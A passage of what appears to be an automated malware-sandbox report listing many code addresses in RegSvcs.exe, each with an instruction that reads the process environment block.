                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133E7E1 mov eax, dword ptr fs:[00000030h]7_2_0133E7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BC7C0 mov eax, dword ptr fs:[00000030h]7_2_012BC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013307C3 mov eax, dword ptr fs:[00000030h]7_2_013307C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B262C mov eax, dword ptr fs:[00000030h]7_2_012B262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012CE627 mov eax, dword ptr fs:[00000030h]7_2_012CE627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E6620 mov eax, dword ptr fs:[00000030h]7_2_012E6620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E8620 mov eax, dword ptr fs:[00000030h]7_2_012E8620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C260B mov eax, dword ptr fs:[00000030h]7_2_012C260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C260B mov eax, dword ptr fs:[00000030h]7_2_012C260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C260B mov eax, dword ptr fs:[00000030h]7_2_012C260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C260B mov eax, dword ptr fs:[00000030h]7_2_012C260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C260B mov eax, dword ptr fs:[00000030h]7_2_012C260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C260B mov eax, dword ptr fs:[00000030h]7_2_012C260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C260B mov eax, dword ptr fs:[00000030h]7_2_012C260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2619 mov eax, dword ptr fs:[00000030h]7_2_012F2619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132E609 mov eax, dword ptr fs:[00000030h]7_2_0132E609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EA660 mov eax, dword ptr fs:[00000030h]7_2_012EA660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EA660 mov eax, dword ptr fs:[00000030h]7_2_012EA660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137866E mov eax, dword ptr fs:[00000030h]7_2_0137866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137866E mov eax, dword ptr fs:[00000030h]7_2_0137866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E2674 mov eax, dword ptr fs:[00000030h]7_2_012E2674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012CC640 mov eax, dword ptr fs:[00000030h]7_2_012CC640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EC6A6 mov eax, dword ptr fs:[00000030h]7_2_012EC6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E66B0 mov eax, dword ptr fs:[00000030h]7_2_012E66B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B4690 mov eax, dword ptr fs:[00000030h]7_2_012B4690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B4690 mov eax, dword ptr fs:[00000030h]7_2_012B4690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132E6F2 mov eax, dword ptr fs:[00000030h]7_2_0132E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132E6F2 mov eax, dword ptr fs:[00000030h]7_2_0132E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132E6F2 mov eax, dword ptr fs:[00000030h]7_2_0132E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132E6F2 mov eax, dword ptr fs:[00000030h]7_2_0132E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013306F1 mov eax, dword ptr fs:[00000030h]7_2_013306F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013306F1 mov eax, dword ptr fs:[00000030h]7_2_013306F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EA6C7 mov ebx, dword ptr fs:[00000030h]7_2_012EA6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EA6C7 mov eax, dword ptr fs:[00000030h]7_2_012EA6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133892A mov eax, dword ptr fs:[00000030h]7_2_0133892A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0134892B mov eax, dword ptr fs:[00000030h]7_2_0134892B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133C912 mov eax, dword ptr fs:[00000030h]7_2_0133C912
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012A8918 mov eax, dword ptr fs:[00000030h]7_2_012A8918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012A8918 mov eax, dword ptr fs:[00000030h]7_2_012A8918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132E908 mov eax, dword ptr fs:[00000030h]7_2_0132E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132E908 mov eax, dword ptr fs:[00000030h]7_2_0132E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F096E mov eax, dword ptr fs:[00000030h]7_2_012F096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F096E mov edx, dword ptr fs:[00000030h]7_2_012F096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F096E mov eax, dword ptr fs:[00000030h]7_2_012F096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01354978 mov eax, dword ptr fs:[00000030h]7_2_01354978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01354978 mov eax, dword ptr fs:[00000030h]7_2_01354978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D6962 mov eax, dword ptr fs:[00000030h]7_2_012D6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D6962 mov eax, dword ptr fs:[00000030h]7_2_012D6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D6962 mov eax, dword ptr fs:[00000030h]7_2_012D6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133C97C mov eax, dword ptr fs:[00000030h]7_2_0133C97C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01330946 mov eax, dword ptr fs:[00000030h]7_2_01330946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01384940 mov eax, dword ptr fs:[00000030h]7_2_01384940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013389B3 mov esi, dword ptr fs:[00000030h]7_2_013389B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013389B3 mov eax, dword ptr fs:[00000030h]7_2_013389B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013389B3 mov eax, dword ptr fs:[00000030h]7_2_013389B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B09AD mov eax, dword ptr fs:[00000030h]7_2_012B09AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B09AD mov eax, dword ptr fs:[00000030h]7_2_012B09AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C29A0 mov eax, dword ptr fs:[00000030h]7_2_012C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C29A0 mov eax, dword ptr fs:[00000030h]7_2_012C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C29A0 mov eax, dword ptr fs:[00000030h]7_2_012C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C29A0 mov eax, dword ptr fs:[00000030h]7_2_012C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C29A0 mov eax, dword ptr fs:[00000030h]7_2_012C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C29A0 mov eax, dword ptr fs:[00000030h]7_2_012C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C29A0 mov eax, dword ptr fs:[00000030h]7_2_012C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C29A0 mov eax, dword ptr fs:[00000030h]7_2_012C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C29A0 mov eax, dword ptr fs:[00000030h]7_2_012C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C29A0 mov eax, dword ptr fs:[00000030h]7_2_012C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C29A0 mov eax, dword ptr fs:[00000030h]7_2_012C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C29A0 mov eax, dword ptr fs:[00000030h]7_2_012C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C29A0 mov eax, dword ptr fs:[00000030h]7_2_012C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133E9E0 mov eax, dword ptr fs:[00000030h]7_2_0133E9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E29F9 mov eax, dword ptr fs:[00000030h]7_2_012E29F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E29F9 mov eax, dword ptr fs:[00000030h]7_2_012E29F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137A9D3 mov eax, dword ptr fs:[00000030h]7_2_0137A9D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013469C0 mov eax, dword ptr fs:[00000030h]7_2_013469C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA9D0 mov eax, dword ptr fs:[00000030h]7_2_012BA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA9D0 mov eax, dword ptr fs:[00000030h]7_2_012BA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA9D0 mov eax, dword ptr fs:[00000030h]7_2_012BA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA9D0 mov eax, dword ptr fs:[00000030h]7_2_012BA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA9D0 mov eax, dword ptr fs:[00000030h]7_2_012BA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA9D0 mov eax, dword ptr fs:[00000030h]7_2_012BA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E49D0 mov eax, dword ptr fs:[00000030h]7_2_012E49D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135483A mov eax, dword ptr fs:[00000030h]7_2_0135483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135483A mov eax, dword ptr fs:[00000030h]7_2_0135483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D2835 mov eax, dword ptr fs:[00000030h]7_2_012D2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D2835 mov eax, dword ptr fs:[00000030h]7_2_012D2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D2835 mov eax, dword ptr fs:[00000030h]7_2_012D2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D2835 mov ecx, dword ptr fs:[00000030h]7_2_012D2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D2835 mov eax, dword ptr fs:[00000030h]7_2_012D2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D2835 mov eax, dword ptr fs:[00000030h]7_2_012D2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EA830 mov eax, dword ptr fs:[00000030h]7_2_012EA830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133C810 mov eax, dword ptr fs:[00000030h]7_2_0133C810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133E872 mov eax, dword ptr fs:[00000030h]7_2_0133E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133E872 mov eax, dword ptr fs:[00000030h]7_2_0133E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01346870 mov eax, dword ptr fs:[00000030h]7_2_01346870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01346870 mov eax, dword ptr fs:[00000030h]7_2_01346870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C2840 mov ecx, dword ptr fs:[00000030h]7_2_012C2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B4859 mov eax, dword ptr fs:[00000030h]7_2_012B4859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B4859 mov eax, dword ptr fs:[00000030h]7_2_012B4859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E0854 mov eax, dword ptr fs:[00000030h]7_2_012E0854
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B0887 mov eax, dword ptr fs:[00000030h]7_2_012B0887
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133C89D mov eax, dword ptr fs:[00000030h]7_2_0133C89D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137A8E4 mov eax, dword ptr fs:[00000030h]7_2_0137A8E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EC8F9 mov eax, dword ptr fs:[00000030h]7_2_012EC8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EC8F9 mov eax, dword ptr fs:[00000030h]7_2_012EC8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE8C0 mov eax, dword ptr fs:[00000030h]7_2_012DE8C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013808C0 mov eax, dword ptr fs:[00000030h]7_2_013808C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DEB20 mov eax, dword ptr fs:[00000030h]7_2_012DEB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DEB20 mov eax, dword ptr fs:[00000030h]7_2_012DEB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01378B28 mov eax, dword ptr fs:[00000030h]7_2_01378B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01378B28 mov eax, dword ptr fs:[00000030h]7_2_01378B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132EB1D mov eax, dword ptr fs:[00000030h]7_2_0132EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132EB1D mov eax, dword ptr fs:[00000030h]7_2_0132EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132EB1D mov eax, dword ptr fs:[00000030h]7_2_0132EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132EB1D mov eax, dword ptr fs:[00000030h]7_2_0132EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132EB1D mov eax, dword ptr fs:[00000030h]7_2_0132EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132EB1D mov eax, dword ptr fs:[00000030h]7_2_0132EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132EB1D mov eax, dword ptr fs:[00000030h]7_2_0132EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132EB1D mov eax, dword ptr fs:[00000030h]7_2_0132EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132EB1D mov eax, dword ptr fs:[00000030h]7_2_0132EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01384B00 mov eax, dword ptr fs:[00000030h]7_2_01384B00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012ACB7E mov eax, dword ptr fs:[00000030h]7_2_012ACB7E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135EB50 mov eax, dword ptr fs:[00000030h]7_2_0135EB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01382B57 mov eax, dword ptr fs:[00000030h]7_2_01382B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01382B57 mov eax, dword ptr fs:[00000030h]7_2_01382B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01382B57 mov eax, dword ptr fs:[00000030h]7_2_01382B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01382B57 mov eax, dword ptr fs:[00000030h]7_2_01382B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01346B40 mov eax, dword ptr fs:[00000030h]7_2_01346B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01346B40 mov eax, dword ptr fs:[00000030h]7_2_01346B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137AB40 mov eax, dword ptr fs:[00000030h]7_2_0137AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01358B42 mov eax, dword ptr fs:[00000030h]7_2_01358B42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012A8B50 mov eax, dword ptr fs:[00000030h]7_2_012A8B50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01364B4B mov eax, dword ptr fs:[00000030h]7_2_01364B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01364B4B mov eax, dword ptr fs:[00000030h]7_2_01364B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01364BB0 mov eax, dword ptr fs:[00000030h]7_2_01364BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01364BB0 mov eax, dword ptr fs:[00000030h]7_2_01364BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0BBE mov eax, dword ptr fs:[00000030h]7_2_012C0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0BBE mov eax, dword ptr fs:[00000030h]7_2_012C0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133CBF0 mov eax, dword ptr fs:[00000030h]7_2_0133CBF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DEBFC mov eax, dword ptr fs:[00000030h]7_2_012DEBFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B8BF0 mov eax, dword ptr fs:[00000030h]7_2_012B8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B8BF0 mov eax, dword ptr fs:[00000030h]7_2_012B8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B8BF0 mov eax, dword ptr fs:[00000030h]7_2_012B8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135EBD0 mov eax, dword ptr fs:[00000030h]7_2_0135EBD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B0BCD mov eax, dword ptr fs:[00000030h]7_2_012B0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B0BCD mov eax, dword ptr fs:[00000030h]7_2_012B0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B0BCD mov eax, dword ptr fs:[00000030h]7_2_012B0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D0BCB mov eax, dword ptr fs:[00000030h]7_2_012D0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D0BCB mov eax, dword ptr fs:[00000030h]7_2_012D0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D0BCB mov eax, dword ptr fs:[00000030h]7_2_012D0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DEA2E mov eax, dword ptr fs:[00000030h]7_2_012DEA2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012ECA24 mov eax, dword ptr fs:[00000030h]7_2_012ECA24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012ECA38 mov eax, dword ptr fs:[00000030h]7_2_012ECA38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D4A35 mov eax, dword ptr fs:[00000030h]7_2_012D4A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D4A35 mov eax, dword ptr fs:[00000030h]7_2_012D4A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133CA11 mov eax, dword ptr fs:[00000030h]7_2_0133CA11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132CA72 mov eax, dword ptr fs:[00000030h]7_2_0132CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132CA72 mov eax, dword ptr fs:[00000030h]7_2_0132CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012ECA6F mov eax, dword ptr fs:[00000030h]7_2_012ECA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012ECA6F mov eax, dword ptr fs:[00000030h]7_2_012ECA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012ECA6F mov eax, dword ptr fs:[00000030h]7_2_012ECA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135EA60 mov eax, dword ptr fs:[00000030h]7_2_0135EA60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0A5B mov eax, dword ptr fs:[00000030h]7_2_012C0A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0A5B mov eax, dword ptr fs:[00000030h]7_2_012C0A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B6A50 mov eax, dword ptr fs:[00000030h]7_2_012B6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B6A50 mov eax, dword ptr fs:[00000030h]7_2_012B6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B6A50 mov eax, dword ptr fs:[00000030h]7_2_012B6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B6A50 mov eax, dword ptr fs:[00000030h]7_2_012B6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B6A50 mov eax, dword ptr fs:[00000030h]7_2_012B6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B6A50 mov eax, dword ptr fs:[00000030h]7_2_012B6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B6A50 mov eax, dword ptr fs:[00000030h]7_2_012B6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B8AA0 mov eax, dword ptr fs:[00000030h]7_2_012B8AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B8AA0 mov eax, dword ptr fs:[00000030h]7_2_012B8AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01306AA4 mov eax, dword ptr fs:[00000030h]7_2_01306AA4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BEA80 mov eax, dword ptr fs:[00000030h]7_2_012BEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BEA80 mov eax, dword ptr fs:[00000030h]7_2_012BEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BEA80 mov eax, dword ptr fs:[00000030h]7_2_012BEA80
